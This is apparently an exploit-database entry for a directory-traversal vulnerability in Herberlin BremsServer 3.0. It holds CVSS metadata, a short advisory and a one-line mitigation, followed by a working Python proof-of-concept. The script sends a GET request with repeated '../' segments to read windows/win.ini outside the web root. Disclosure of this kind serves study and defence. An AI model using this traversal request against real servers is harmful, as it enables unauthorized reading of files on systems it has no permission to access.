header-logo
Suggest Exploit
vendor:
BremsServer
by:
SecurityFocus
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: BremsServer
Affected Version From: BremsServer 3.0
Affected Version To: BremsServer 3.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

Herberlin BremsServer Directory Traversal Vulnerability

Herberlin BremsServer is prone to a directory-traversal vulnerability. An attacker may exploit this issue to gain access to files residing outside the web server root directory of the affected system. This issue exists due to a failure to validate user specified URI input.

Mitigation:

Validate user specified URI input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9493/info

Herberlin BremsServer is prone to a directory-traversal vulnerability. An attacker may exploit this issue to gain access to files residing outside the web server root directory of the affected system. This issue exists due to a failure to validate user specified URI input.

BremsServer 3.0 is vulnerable; other versions may also be affected.

# --PoC--

import socket

host = 'localhost'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)    

s.send('GET /' + '../' * 16 + 'windows/win.ini HTTP/1.1\r\n'
       'Host: localhost\r\n\r\n')

print s.recv(8192)